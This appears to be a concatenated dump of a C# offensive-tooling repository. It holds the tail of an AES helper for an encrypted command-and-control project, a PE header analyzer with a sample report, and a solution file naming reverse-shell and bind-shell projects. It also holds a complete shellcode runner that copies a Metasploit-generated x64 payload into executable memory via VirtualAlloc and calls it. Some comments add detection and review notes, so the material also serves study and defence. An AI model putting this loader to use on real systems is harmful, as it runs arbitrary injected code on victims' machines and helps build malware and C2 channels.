86 | output = Encoding.ASCII.GetString(stream.ToArray());
87 | }
88 | }
89 |
90 | return output;
91 | }
92 |
93 | /// <summary>
94 | /// Perform AES encryption on the string with IV and Key and return raw data
95 | /// </summary>
96 | /// <remarks>Reference: https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.aes?view=net-5.0
97 | /// Mode and padding are left at the Aes.Create() defaults and no MAC is added, so a modified ciphertext is not detected. Client.cs and Server.cs pass the same IV for every message of a session.</remarks>
98 | /// <param name="payload">String data to encrypt</param>
99 | /// <param name="iv">Initializing Vector; its ASCII bytes are assigned to aes.IV</param>
100 | /// <param name="key">Encryption key; its ASCII bytes are assigned to aes.Key</param>
101 | /// <returns>Encrypted raw bytes</returns>
102 | public static byte[] EncryptData(string payload, string iv, string key) {
103 | byte[] encrypted;
104 |
105 | using(var aes = Aes.Create()) {
106 | aes.IV = Encoding.ASCII.GetBytes(iv); // the setters reject sizes AES does not support
107 | aes.Key = Encoding.ASCII.GetBytes(key);
108 |
109 | var crypt = aes.CreateEncryptor(aes.Key, aes.IV);
110 |
111 | using (var memStream = new MemoryStream()) {
112 | using(var cStream = new CryptoStream(memStream, crypt, CryptoStreamMode.Write)) {
113 | using(var ws = new StreamWriter(cStream)) {
114 | ws.Write(payload);
115 | }
116 | encrypted = memStream.ToArray(); // read only after the writer above is disposed, which closes the CryptoStream and flushes the final block
117 | }
118 | }
119 | }
120 |
121 | return encrypted;
122 | }
123 |
124 | /// <summary>
125 | /// Perform AES decryption on the bytes with IV and Key and return string data
126 | /// </summary>
127 | /// <remarks>Reference: https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.aes?view=net-5.0
128 | /// Uses the same Aes.Create() defaults as EncryptData; there is no integrity check before decryption.</remarks>
129 | /// <param name="payload">Payload to decrypt</param>
130 | /// <param name="iv">Initializing Vector; its ASCII bytes are assigned to aes.IV</param>
131 | /// <param name="key">Encryption key; its ASCII bytes are assigned to aes.Key</param>
132 | /// <returns>Decrypted string</returns>
133 | public static string DecryptData(byte[] payload, string iv, string key) {
134 | string decrypted = string.Empty;
135 |
136 | using (var aes = Aes.Create()) {
137 | aes.IV = Encoding.ASCII.GetBytes(iv);
138 | aes.Key = Encoding.ASCII.GetBytes(key);
139 |
140 | var crypt = aes.CreateDecryptor(aes.Key, aes.IV);
141 |
142 | using (var memStream = new MemoryStream(payload)) {
143 | using (var cStream = new CryptoStream(memStream, crypt, CryptoStreamMode.Read)) {
144 | using(var rs = new StreamReader(cStream)) {
145 | decrypted = rs.ReadToEnd(); // exceptions from a wrong key/IV or a damaged ciphertext are not caught here
146 | }
147 | }
148 | }
149 | }
150 |
151 | return decrypted;
152 | }
153 |
154 | /// <summary>
155 | /// Get a random string from charset of certain length. NOTE(review): the values become the session IV and key, but System.Random is not a cryptographic generator.
156 | /// </summary>
157 | /// <param name="length">How many characters?</param>
158 | /// <returns>String of <paramref name="length"/> characters drawn from charSet</returns>
159 | public static string GetRandomString(int length) {
160 | Random random = new(); // a new System.Random instance on every call
161 | string password = string.Empty;
162 |
163 | for (int i = 0; i < length; i++) {
164 | int idx = random.Next(0, charSet.Length); // upper bound is exclusive, so idx is always a valid index
165 | password += charSet[idx];
166 | }
167 |
168 | return password;
169 | }
170 |
171 | /// <summary>
172 | /// Convert the raw data to base64 string
173 | /// </summary>
174 | /// <param name="data">Bytes to encode</param>
175 | /// <returns>Base64 text, used as the one-line wire format</returns>
176 | public static string SerializeBytes(byte[] data) {
177 | return Convert.ToBase64String(data);
178 | }
179 |
180 | /// <summary>
181 | /// Convert the base64 string to underlying raw data
182 | /// </summary>
183 | /// <param name="data">Base64 text; Convert.FromBase64String throws on null or invalid input</param>
184 | /// <returns>Decoded bytes</returns>
185 | public static byte[] DeserializeData(string data) {
186 | return Convert.FromBase64String(data);
187 | }
188 |
189 | public static bool HasExchangedKeys { // static, so the flag is shared by everything in the process
190 | get => hasExchangeKey;
191 | set => hasExchangeKey = value;
192 | }
193 | }
194 |
195 |
--------------------------------------------------------------------------------
/PE Analysis Using PeNet/PE Analysis Using PeNet.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 | PE_Analysis_Using_PeNet
7 |
8 |
9 |
10 |
11 | ..\..\PeNet\src\PeNet\bin\Debug\net5.0\PeNet.dll
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/PE Analysis Using PeNet/PeFileDllAnalysis.txt:
--------------------------------------------------------------------------------
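1 | // This file contains the PE file analysis of the DLL file generated after compiling for the x64 architecture. Note: the header below nevertheless reports I386/Bit32, and the creation date lies in 2067; deterministic .NET builds likely account for the date (the timestamp field then holds a hash-derived value), so do not rely on it when triaging a sample.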
2 |
3 | [!] PE File Header
4 | [+] Machine Type: I386
5 | [+] Number of Sections: 3
6 | [+] Date and time of image creation: 26-08-2067 08:17:57
7 | [+] Number of Symbols: 0
8 | [+] File Characteristrics: ExecutableImage, LargeAddressAware
9 | [!] Optional Header
10 | [+] Magic: Bit32
11 | [+] Linker Version: 48.0
12 | [+] Size of Code: 14336
13 | [+] Size of Initialized Data: 2048
14 | [+] Size of Uninitialized Data: 0
15 | [+] Address of Entrypoint: 0x0000561A
16 | [+] Base of Code (RVA): 0x00002000
17 | [+] Base of Code (VA): 0x0000000000402000
18 | [+] Base of Image Loading (VA): 0x0000000000400000
19 | [+] Section Alignment: 8192
20 | [+] File Alignment: 512
21 | [+] Operating System Version Required: 4.0
22 | [+] Image Version Required: 0.0
23 | [+] Subsystem Version to Execute File: 4.0
24 | [+] Size of Image File: 40960
25 | [+] Size of all Headers: 512
26 | [+] Subsystem Required to Execute: WindowsCui
27 | [+] Dll Characteristics of Image: 34144
28 | [+] Size of Stack Commit and Reserve: 4096 1048576
29 | [+] Size of Heap Commit and Reserve: 4096 1048576
30 | [+] Number of Directory Entries: 16
31 | [!] Imported Functions
32 | [+] Function Name: _CorExeMain
33 | DLL: mscoree.dll
34 | IAT Offset: 0
35 | [!] Resource Directories
36 | [+] Characteristics: 0x00000000
37 | [+] Version: 0.0
38 | [+] Total Entries: 2
39 | [!] Data Entries
40 | [+] ID: 16 Name: Version
41 | Entry Type: ID Entry
42 | Data is Directory: True
43 | [+] ID: 24 Name: Manifest
44 | Entry Type: ID Entry
45 | Data is Directory: True
46 |
--------------------------------------------------------------------------------
/PE Analysis Using PeNet/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Linq;
3 | using System.Diagnostics;
4 | using PeNet;
5 |
static class Utils {

    /// <summary>
    /// Formats a byte array as a "0x"-prefixed hex string, emitting the bytes in
    /// reverse order (last byte first).
    /// </summary>
    /// <param name="b">Bytes to format; the callers in this file pass BitConverter.GetBytes output.</param>
    /// <returns>Two upper-case hex digits per byte, prefixed with "0x".</returns>
    public static string Hexify(byte[] b) {
        // BitConverter.ToString yields "AA-BB-CC"; split it into one entry per byte.
        string[] octets = BitConverter.ToString(b).Split("-");

        // Reversing makes a value serialized on a little-endian host read
        // most-significant byte first, the usual way addresses are written.
        Array.Reverse(octets);

        return "0x" + string.Concat(octets);
    }
}
18 |
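/// <summary>
/// Command-line PE inspector: prints the file header, the optional header, the
/// data directories that are present and the section headers of the file named
/// by the first argument, using PeNet for parsing.
/// </summary>
class Program {

    /// <summary>
    /// Parses the file at <c>args[0]</c> and writes a report to standard output.
    /// Exits with status 1 when no argument is given or the file is not a PE file.
    /// </summary>
    /// <param name="args">Command-line arguments; <c>args[0]</c> is the path of the file to inspect.</param>
    static void Main(string[] args) {
        // safeguard arguments
        if (args.Length == 0) {
            Console.Error.WriteLine("Usage: '{0}' ", Process.GetCurrentProcess().MainModule.ModuleName);
            Environment.Exit(1);
        }

        // check if it is a PE file
        if (!PeFile.IsPeFile(args[0])) {
            Console.Error.WriteLine("[x] '{0}' is not a valid PE file.", args[0]);
            Environment.Exit(1);
        }

        // Everything printed below (function, DLL, resource and section names included)
        // is read from the inspected file. When that file is an untrusted sample, treat
        // the report text as attacker-controlled in whatever consumes it.
        var pe = new PeFile(args[0]);

        // ==================================
        // Image NT Headers (PE File Only)
        // ==================================
        Console.WriteLine("[!] PE File Header");
        var fh = pe.ImageNtHeaders.FileHeader;
        Console.WriteLine("\t[+] Machine Type: {0}", fh.Machine);
        Console.WriteLine("\t[+] Number of Sections: {0}", fh.NumberOfSections);
        // TimeDateStamp is interpreted as seconds since 1970-01-01. The field is set by the
        // toolchain and is not guaranteed to be a real build time (the sample DLL report in
        // this project shows a date in 2067), so do not rely on it as evidence on its own.
        Console.WriteLine("\t[+] Date and time of image creation: {0}", new DateTime(1970, 01, 01, 0, 0, 0).AddSeconds(fh.TimeDateStamp).ToString());
        Console.WriteLine("\t[+] Number of Symbols: {0}", fh.NumberOfSymbols);
        Console.WriteLine("\t[+] File Characteristrics: {0}", fh.Characteristics);

        Console.WriteLine("[!] Optional Header");
        var oh = pe.ImageNtHeaders.OptionalHeader;
        Console.WriteLine("\t[+] Magic: {0}", oh.Magic);
        Console.WriteLine("\t[+] Linker Version: {0}.{1}", oh.MajorLinkerVersion, oh.MinorLinkerVersion);
        Console.WriteLine("\t[+] Size of Code: {0}", oh.SizeOfCode);
        Console.WriteLine("\t[+] Size of Initialized Data: {0}", oh.SizeOfInitializedData);
        Console.WriteLine("\t[+] Size of Uninitialized Data: {0}", oh.SizeOfUninitializedData);
        Console.WriteLine("\t[+] Address of Entrypoint: {0}", Utils.Hexify(BitConverter.GetBytes(oh.AddressOfEntryPoint)));
        Console.WriteLine("\t[+] Base of Code (RVA): {0}", Utils.Hexify(BitConverter.GetBytes(oh.BaseOfCode)));
        Console.WriteLine("\t[+] Base of Code (VA): {0}", Utils.Hexify(BitConverter.GetBytes(oh.BaseOfCode + oh.ImageBase)));
        Console.WriteLine("\t[+] Base of Image Loading (VA): {0}", Utils.Hexify(BitConverter.GetBytes(oh.ImageBase)));
        Console.WriteLine("\t[+] Section Alignment: {0}", oh.SectionAlignment);
        Console.WriteLine("\t[+] File Alignment: {0}", oh.FileAlignment);
        Console.WriteLine("\t[+] Operating System Version Required: {0}.{1}", oh.MajorOperatingSystemVersion, oh.MinorOperatingSystemVersion);
        Console.WriteLine("\t[+] Image Version Required: {0}.{1}", oh.MajorImageVersion, oh.MinorImageVersion);
        Console.WriteLine("\t[+] Subsystem Version to Execute File: {0}.{1}", oh.MajorSubsystemVersion, oh.MinorSubsystemVersion);
        Console.WriteLine("\t[+] Size of Image File: {0}", oh.SizeOfImage);
        Console.WriteLine("\t[+] Size of all Headers: {0}", oh.SizeOfHeaders);
        Console.WriteLine("\t[+] Subsystem Required to Execute: {0}", oh.Subsystem);
        Console.WriteLine("\t[+] Dll Characteristics of Image: {0}", oh.DllCharacteristics);
        Console.WriteLine("\t[+] Size of Stack Commit and Reserve: {0}\t{1}", oh.SizeOfStackCommit, oh.SizeOfStackReserve);
        Console.WriteLine("\t[+] Size of Heap Commit and Reserve: {0}\t{1}", oh.SizeOfHeapCommit, oh.SizeOfHeapReserve);
        Console.WriteLine("\t[+] Number of Directory Entries: {0}", oh.NumberOfRvaAndSizes);

        // ==================================
        // Available Data Directories
        // (If it is not present, the contents and title will be skipped)
        // ==================================
        // Every directory below is null-checked before it is dereferenced, so that an
        // absent directory is skipped as the banner above promises instead of ending the
        // run with a NullReferenceException before the section list is printed.
        if (pe.ExportedFunctions != null && pe.ExportedFunctions.Length > 0)
        {
            Console.WriteLine("[!] Exported Functions");
            foreach (var f in pe.ExportedFunctions)
            {
                Console.WriteLine("\t[+] Function Name: {0}", f.Name);
                Console.WriteLine("\t Ordinal Number: {0}", f.Ordinal);
                Console.WriteLine("\t Address: {0}", f.Address.ToHexString());
            }
        }

        // For a managed assembly this list only shows the CLR bootstrap import (the sample
        // report lists just _CorExeMain from mscoree.dll); P/Invoke targets are recorded in
        // the .NET metadata and do not appear here.
        if (pe.ImportedFunctions != null && pe.ImportedFunctions.Length > 0)
        {
            Console.WriteLine("[!] Imported Functions");
            foreach (var f in pe.ImportedFunctions)
            {
                Console.WriteLine("\t[+] Function Name: {0}", f.Name);
                Console.WriteLine("\t DLL: {0}", f.DLL);
                Console.WriteLine("\t IAT Offset: {0}", f.IATOffset);
            }
        }

        if (pe.ImageResourceDirectory != null)
        {
            Console.WriteLine("[!] Resource Directories");
            Console.WriteLine("\t[+] Characteristics: {0}", pe.ImageResourceDirectory.Characteristics.ToHexString());
            Console.WriteLine("\t[+] Version: {0}.{1}", pe.ImageResourceDirectory.MajorVersion, pe.ImageResourceDirectory.MinorVersion);
            Console.WriteLine("\t[+] Total Entries: {0}", pe.ImageResourceDirectory.NumberOfIdEntries + pe.ImageResourceDirectory.NumberOfNameEntries);
            Console.WriteLine("\t[!] Data Entries");

            foreach (var e in pe.ImageResourceDirectory.DirectoryEntries)
            {
                Console.WriteLine("\t\t[+] ID: {0}\t\tName: {1}", e.ID, e.NameResolved);
                Console.WriteLine("\t\t Entry Type: {0}", e.IsIdEntry ? "ID Entry" : e.IsNamedEntry ? "Named Entry" : "Unknown");
                Console.WriteLine("\t\t Data is Directory: {0}", e.DataIsDirectory);
            }
        }

        if (pe.ExceptionDirectory != null && pe.ExceptionDirectory.Length > 0)
        {
            Console.WriteLine("[!] Exception Directory");
            foreach (var e in pe.ExceptionDirectory)
            {
                Console.WriteLine("\t[+] Function Start: {0}\t\tFunction End: {1}", e.FunctionStart.ToHexString(), e.FunctionEnd.ToHexString());
                Console.WriteLine("\t Unwind Information");
                Console.WriteLine("\t \tVersion: {0}\t\tFlags: {1}", e.ResolvedUnwindInfo.Version, e.ResolvedUnwindInfo.Flags);
                Console.WriteLine("\t \tFunction Entry: {0}", e.ResolvedUnwindInfo.FunctionEntry.ToHexString());
                Console.WriteLine("\t \tCount of Codes: {0}", e.ResolvedUnwindInfo.CountOfCodes);
                Console.WriteLine("\t \tUnwind Codes: {0} entries", e.ResolvedUnwindInfo.UnwindCode.Length);
                foreach (var c in e.ResolvedUnwindInfo.UnwindCode)
                {
                    Console.WriteLine("\t \t \tUnwind Operation: {0}", c.UnwindOp);
                    Console.WriteLine("\t \t \tFrame Offset: {0}\t\tCode Offset: {1}", c.FrameOffset.ToHexString(), c.CodeOffset.ToHexString());
                }
            }
        }

        if (pe.ImageRelocationDirectory != null && pe.ImageRelocationDirectory.Length > 0)
        {
            Console.WriteLine("[!] Relocation Directory");
            foreach (var e in pe.ImageRelocationDirectory)
            {
                Console.WriteLine("\t[+] Size of Block: {0}\t\tVirtual Address: {1}", e.SizeOfBlock.ToHexString(), e.VirtualAddress.ToHexString());
                Console.WriteLine("\t Type Offsets: {0} entries", e.TypeOffsets.Length);
                foreach (var t in e.TypeOffsets)
                {
                    Console.WriteLine("\t \tOffset: {0}\t\tType: {1}", t.Offset.ToHexString(), t.Type);
                }
            }
        }

        if (pe.ImageDebugDirectory != null && pe.ImageDebugDirectory.Length > 0)
        {
            Console.WriteLine("[!] Debug Directory");
            foreach (var e in pe.ImageDebugDirectory)
            {
                Console.WriteLine("\t[+] Size of Data: {0}\t\tPointer to Raw Data: {1}", e.SizeOfData.ToHexString(), e.PointerToRawData.ToHexString());
                Console.WriteLine("\t Version: {0}.{1}\t\t\t\tType: {2}", e.MajorVersion, e.MinorVersion, e.Type);
                Console.WriteLine("\t Characteristics: {0}\t\tAddress of Raw Data: {1}", e.Characteristics.ToHexString(), e.AddressOfRawData.ToHexString());
            }
        }

        if (pe.ImageTlsDirectory != null)
        {
            Console.WriteLine("[!] TLS Directory");
            Console.WriteLine("\t[+] Characteristics: {0}", pe.ImageTlsDirectory.Characteristics);
            Console.WriteLine("\t[+] Address of Callbacks: {0}", pe.ImageTlsDirectory.AddressOfCallBacks.ToHexString());
            Console.WriteLine("\t[+] Address of Index: {0}", pe.ImageTlsDirectory.AddressOfIndex.ToHexString());
            Console.WriteLine("\t[+] Start of Raw Data: {0}\t\tEnd of Raw Data: {1}", pe.ImageTlsDirectory.StartAddressOfRawData.ToHexString(), pe.ImageTlsDirectory.EndAddressOfRawData);
            Console.WriteLine("\t[+] Size of ZeroFile: {0}", pe.ImageTlsDirectory.SizeOfZeroFill);
            if (pe.ImageTlsDirectory.TlsCallbacks != null && pe.ImageTlsDirectory.TlsCallbacks.Length > 0)
            {
                Console.WriteLine("\t[+] TLS Callbacks: {0} entries", pe.ImageTlsDirectory.TlsCallbacks.Length);
                foreach (var c in pe.ImageTlsDirectory.TlsCallbacks)
                {
                    Console.WriteLine("\t\t{0}", c.Callback.ToHexString());
                }
            }
        }

        if (pe.ImageLoadConfigDirectory != null)
        {
            Console.WriteLine("[!] Load Config Directory");
            Console.WriteLine("\t[+] Size: {0}\t\tEdit List: {1}", pe.ImageLoadConfigDirectory.Size, pe.ImageLoadConfigDirectory.EditList);
            Console.WriteLine("\t[+] Critial Section Default Timeout: {0}", pe.ImageLoadConfigDirectory.CriticalSectionDefaultTimeout);
            Console.WriteLine("\t[+] Commit Free Block Threshold: {0}\t\tCommit Total Free Threshold: {1}", pe.ImageLoadConfigDirectory.DeCommitFreeBlockThreshold, pe.ImageLoadConfigDirectory.DeCommitTotalFreeThreshold);
            Console.WriteLine("\t[+] Version: {0}.{1}", pe.ImageLoadConfigDirectory.MajorVesion, pe.ImageLoadConfigDirectory.MinorVersion);
        }

        if (pe.ImageBoundImportDescriptor != null)
        {
            Console.WriteLine("[!] Bound Import Directory");
            Console.WriteLine("\t[+] Number of Module Forwarder Refs: {0}", pe.ImageBoundImportDescriptor.NumberOfModuleForwarderRefs);
            Console.WriteLine("\t[+] Offset Module Name: {0}", pe.ImageBoundImportDescriptor.OffsetModuleName);
        }


        // ==================================
        // Image Section Headers
        // ==================================
        if (pe.ImageSectionHeaders != null && pe.ImageSectionHeaders.Length > 0)
        {
            Console.WriteLine("[!] Sections");
            foreach (var s in pe.ImageSectionHeaders)
            {
                Console.WriteLine("\t[!] Name: {0}", s.Name);
                Console.WriteLine("\t Virtual Size: {0}", s.VirtualSize.ToHexString());
                Console.WriteLine("\t Characteristics: {0}", s.Characteristics);
            }
        }
    }
}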
207 |
--------------------------------------------------------------------------------
/PInvoke MSF Payload/PInvoke MSF Payload.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 | PInvoke_MSF_Payload
7 | AnyCPU;ARM32;ARM64;x64;x86
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/PInvoke MSF Payload/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
// Review note: a minimal in-process payload runner. It allocates memory through a
// P/Invoke call to VirtualAlloc, copies the byte array below into that memory and
// invokes the address through a delegate.
// Defensive context: the P/Invoke target of a managed assembly is recorded in its
// .NET metadata rather than in the native import table, so triage of a binary like
// this should inspect the metadata as well as the PE imports.
class Program {
    /*
     * windows/x64/messagebox - 290 bytes
     * https://metasploit.com/
     * VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
     * TITLE=Hacked!, TEXT=Hello T3r@byt3, ICON=NO
     */
    // Per the header comment above, these bytes are x64 machine code generated by
    // Metasploit that displays a message box.
    static byte[] buf = new byte[290] {
        0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
        0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
        0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
        0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
        0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
        0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
        0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
        0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
        0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
        0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
        0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
        0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
        0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
        0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
        0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
        0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
        0x85,0x0d,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
        0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,
        0x6c,0x6f,0x20,0x54,0x33,0x72,0x40,0x62,0x79,0x74,0x33,0x00,0x48,0x61,0x63,
        0x6b,0x65,0x64,0x21,0x00 };

    // declaring VirtualAlloc function from kernel32.dll
    [DllImport("kernel32.dll")]
    static extern IntPtr VirtualAlloc(IntPtr address, uint dwSize, uint allocType, uint mode);

    // create delegate signature for executor function
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    delegate void WindowRun();

    // Entry point: allocate, copy, then call into the copied bytes.
    static void Main() {
        // get pointer of allocated buffer
        // 0x1000 is MEM_COMMIT and 0x40 is PAGE_EXECUTE_READWRITE, so the region is
        // writable and executable at the same time. Private RWX memory that is written
        // and then executed is a common behavioural detection signal for endpoint tooling.
        // The return value is not checked; VirtualAlloc returns a null pointer on failure.
        IntPtr ptr = VirtualAlloc(IntPtr.Zero, Convert.ToUInt32(buf.Length), 0x1000, 0x40);

        // write the buffer into memory
        Marshal.Copy(buf, 0x0, ptr, buf.Length);

        // get function pointer of the allocated buffer
        WindowRun r = Marshal.GetDelegateForFunctionPointer(ptr);

        // execute shellcode
        r();
    }
}
55 |
--------------------------------------------------------------------------------
/Source Code.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31624.102
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "TCP Reverse Shell", "TCP Reverse Shell\TCP Reverse Shell.csproj", "{1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}"
7 | EndProject
8 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "TCP Bind Shell", "TCP Bind Shell\TCP Bind Shell.csproj", "{573F42B5-48A3-4002-9C17-E5934E21BC30}"
9 | EndProject
10 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "PInvoke MSF Payload", "PInvoke MSF Payload\PInvoke MSF Payload.csproj", "{97DC7BD8-F662-438F-A71D-263C58C5B21C}"
11 | EndProject
12 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "Encrypted C2C", "Encryped C2C\Encrypted C2C.csproj", "{EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}"
13 | EndProject
14 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{C6D5E090-876A-4C2F-8B20-A7E6D789DD44}"
15 | ProjectSection(SolutionItems) = preProject
16 | .editorconfig = .editorconfig
17 | EndProjectSection
18 | EndProject
19 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PE Analysis Using PeNet", "PE Analysis Using PeNet\PE Analysis Using PeNet.csproj", "{31E72EA2-4BEF-415A-993E-8C736DC299DA}"
20 | EndProject
21 | Global
22 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
23 | Debug|Any CPU = Debug|Any CPU
24 | Debug|ARM32 = Debug|ARM32
25 | Debug|ARM64 = Debug|ARM64
26 | Debug|x64 = Debug|x64
27 | Debug|x86 = Debug|x86
28 | Release|Any CPU = Release|Any CPU
29 | Release|ARM32 = Release|ARM32
30 | Release|ARM64 = Release|ARM64
31 | Release|x64 = Release|x64
32 | Release|x86 = Release|x86
33 | EndGlobalSection
34 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
35 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
36 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|Any CPU.Build.0 = Debug|Any CPU
37 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|ARM32.ActiveCfg = Debug|ARM32
38 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|ARM32.Build.0 = Debug|ARM32
39 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|ARM64.ActiveCfg = Debug|ARM64
40 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|ARM64.Build.0 = Debug|ARM64
41 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|x64.ActiveCfg = Debug|x64
42 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|x64.Build.0 = Debug|x64
43 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|x86.ActiveCfg = Debug|x86
44 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|x86.Build.0 = Debug|x86
45 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|Any CPU.ActiveCfg = Release|Any CPU
46 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|Any CPU.Build.0 = Release|Any CPU
47 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|ARM32.ActiveCfg = Release|ARM32
48 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|ARM32.Build.0 = Release|ARM32
49 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|ARM64.ActiveCfg = Release|ARM64
50 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|ARM64.Build.0 = Release|ARM64
51 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|x64.ActiveCfg = Release|x64
52 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|x64.Build.0 = Release|x64
53 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|x86.ActiveCfg = Release|x86
54 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|x86.Build.0 = Release|x86
55 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
56 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|Any CPU.Build.0 = Debug|Any CPU
57 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|ARM32.ActiveCfg = Debug|ARM32
58 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|ARM32.Build.0 = Debug|ARM32
59 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|ARM64.ActiveCfg = Debug|ARM64
60 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|ARM64.Build.0 = Debug|ARM64
61 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|x64.ActiveCfg = Debug|x64
62 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|x64.Build.0 = Debug|x64
63 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|x86.ActiveCfg = Debug|x86
64 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|x86.Build.0 = Debug|x86
65 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|Any CPU.ActiveCfg = Release|Any CPU
66 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|Any CPU.Build.0 = Release|Any CPU
67 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|ARM32.ActiveCfg = Release|ARM32
68 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|ARM32.Build.0 = Release|ARM32
69 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|ARM64.ActiveCfg = Release|ARM64
70 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|ARM64.Build.0 = Release|ARM64
71 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|x64.ActiveCfg = Release|x64
72 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|x64.Build.0 = Release|x64
73 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|x86.ActiveCfg = Release|x86
74 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|x86.Build.0 = Release|x86
75 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
76 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|Any CPU.Build.0 = Debug|Any CPU
